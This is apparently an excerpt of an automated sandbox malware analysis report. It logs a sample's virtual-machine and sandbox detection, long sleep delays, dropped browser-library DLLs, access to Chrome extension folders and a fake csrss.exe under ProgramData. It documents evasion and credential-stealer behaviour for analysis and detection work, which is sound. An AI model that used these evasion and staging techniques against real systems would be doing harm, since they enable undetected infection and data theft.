                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: rghwvve, 00000006.00000002.2411410470.00000000005DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKY
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 1F00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 3D10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 1F30000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 6D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 7D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\93B.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Temp\356F.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 357Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1921Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 916Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2345Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 686Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 657Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeWindow / User API: threadDelayed 1389Jump to behavior
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeWindow / User API: threadDelayed 3009
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1381
                Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 8740
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_RegDLL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1P6UB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-GIJA5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbis-0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\zlib1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-HCHL2.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss46EF.tmp\INetC.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\avcodec-58.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libwinpthread-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\avutil-56.dll (copy)Jump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1199.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_isdecmp.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-C4TNB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\SDL2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libogg-0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-399KA.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libbz2-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJL2N.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libiconv-2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-0PI80.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJ17E.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\avformat-58.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-F43KE.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\swresample-3.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-OFQS5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-S9GPV.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-A87KG.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-VN2OC.tmpJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\66E0.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbisenc-2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1HD49.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-13K5P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeEvasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\572.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_9-965
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-4426
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpAPI coverage: 7.6 %
                Source: C:\Windows\explorer.exe TID: 2848Thread sleep time: -192100s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3268Thread sleep time: -91600s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2792Thread sleep time: -32800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2848Thread sleep time: -234500s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exe TID: 1812Thread sleep time: -138900s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exe TID: 5728Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exe TID: 6012Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\356F.exe TID: 3636Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 3960Thread sleep count: 3009 > 30
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 3960Thread sleep time: -6018000s >= -30000s
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 2168Thread sleep count: 88 > 30
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 2168Thread sleep time: -5280000s >= -30000s
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 3960Thread sleep count: 58 > 30
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 3960Thread sleep time: -116000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep count: 1381 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2544Thread sleep count: 202 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep time: -922337203685477s >= -30000s
                Source: C:\ProgramData\Drivers\csrss.exe TID: 5344Thread sleep count: 8740 > 30
                Source: C:\ProgramData\Drivers\csrss.exe TID: 5344Thread sleep time: -874000s >= -30000s
                Source: C:\ProgramData\Drivers\csrss.exe TID: 5344Thread sleep count: 199 > 30
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exe TID: 7160Thread sleep time: -31000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\93B.exeFile opened: PHYSICALDRIVE0
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeLast function: Thread delayed
                Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_00464048
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_004644C4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00452A4C FindFirstFileA,GetLastError,18_2_00452A4C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,18_2_00462ABC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,18_2_004751F8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,18_2_00497A74
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,17_2_00409B30
                Source: C:\Users\user\AppData\Local\Temp\93B.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Temp\356F.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeThread delayed: delay time: 60000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: explorer.exe, 00000002.00000000.2124664252.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
                Source: explorer.exe, 00000002.00000000.2125091063.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2128556080.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
                Source: explorer.exe, 00000002.00000000.2124664252.000000000978C000.00000004.00000001.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2405264297.000000000113A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 572.exe, 00000009.00000003.2470228405.0000000003622000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2481604946.00000000038C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: 572.exe, 00000009.00000003.2644593262.0000000003F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
                Source: 572.exe, 00000009.00000003.3371455222.000000000626F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCQ+Mgq8T7UeC/2woYMrFlxjDMFr68VrX2WjJ7YjnLbHGfSDEn0XiQNjKrjsFj8m
                Source: explorer.exe, 00000002.00000000.2125091063.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: explorer.exe, 00000002.00000000.2125091063.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: 572.exe, 00000009.00000003.2559904607.000000000396A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2499317151.000000000396A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2520530332.000000000396A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2642299627.000000000396A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /Wrduc6jvwcwAlj44kh3VVEHh2YYTbNuDJHs-eX99lDaw5cKZrB1NSUcnNo2NCvjRF+TL8DD+i9M+EYE-eYMMgMzpB/NtbQPiBSEmT4KtYcYocIH4Z4rBzfNhZjA-eYaRw4YPYc5AKnINUyLkd92OAhZR+mnFutTa5DUmo24-eZDgh3X6wxy6O3ZuQk14pwtfgmFhvEOHsp2MjGe7zx0-eZTejzfmPScNC3VtxJzu3uhLk5hhQZbqXaHZx5ZgZII-eZTpG+ymvaJ8/fuGSOkGEbdchSRNMw1HXbELtWBcLiQ-eZsUymQ/21Wpp53KM/AIyr6nL9qfXvwMT1gfgz2l2Bo-eaG7eljku31+HW8ixYvvsP1q3wrWZ6aVNEw6TD54KN4-eayshj8+eG34n2TPo5l0P90Ik62D9RYHDSO+hIuldAQ-ebrS2le4TUMiQA0H5KeLbW0JYr4TxHtmxCpTBhDWlHc-ebrh+ZspUq5lEywffQwq6W+zSSif/JlrN69zNWsq1Bc-ebyzC+DtVRPIF6Amzsarkwqtt0pfNuJjIb8fekI7wxM-eb8zsfVnnZhkUi3+LAkxK7nK63SXVt862YmvhmF/EcA-ec9YVs5ul8kjyCUt3CsKWbD2/BHNzDQVkYnrK7oK4uw-eda1zkXIojowugTye4QJfSkQTtzJAnf6dRWmxy+xPTY-edhWOlEbQ9ZEB7LidauaVtlBOWJvswwoiiL6QHTytXw-ed5xGXeVKeAL2ecyTEL69vEUoNtgz+8RadCfC7g8c4I-efIe5RnJujZDKhozIjjTsHp1RkAhji3p2GiLl36u3QM-efWzHX4L5519v26PS8o5kxtcT3Y6ReIfS0WsUL97s+M-efYtkIDxUWjXRo22oTuvp26KnDNaRWG+tKs1jN+7LEE-efvcdUPS6zT9LYIiVHXPAjyGA/VAiY2mCRaVLEVAPzA-ef1VU7jocEiCrbPRXz3z/Wqul7QhDFSJEjM8DaO4SwI-egrOXasNRUwSfypsv2GSNCsQSPFFciuicmi0dpI0sU4-egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs-eiIMxS+q4kA6Oszx1FETHeYsU3hJ/nAGraIv1XaU93U-eiheONssC27rafOVP++3DRnD3+wmX9BkYaLyoIqplDQ-eimk/v27DM9+TYfptEZJlzCEFMsdZ4LVqFYiY9wOTMI-ei9NmNSqE18cJ4zpx/8UwnnWMmvdqxAzfTVXNB/oXJs-ejJvlKMDa64hrz37oWYT/gY9Q06vQWbcI9GVWPmlwhQ-ejLh9VI0ksR79ltiChqc6n/oNUkV1+RDRs+jr4gMku0-ekNbNuxpg4pAhaL2iol5RigFAMzRMm27+lXwLSZ8fS0-ekSeyvflA23x/eAHqptuiyCE5PLmWX5ElhGS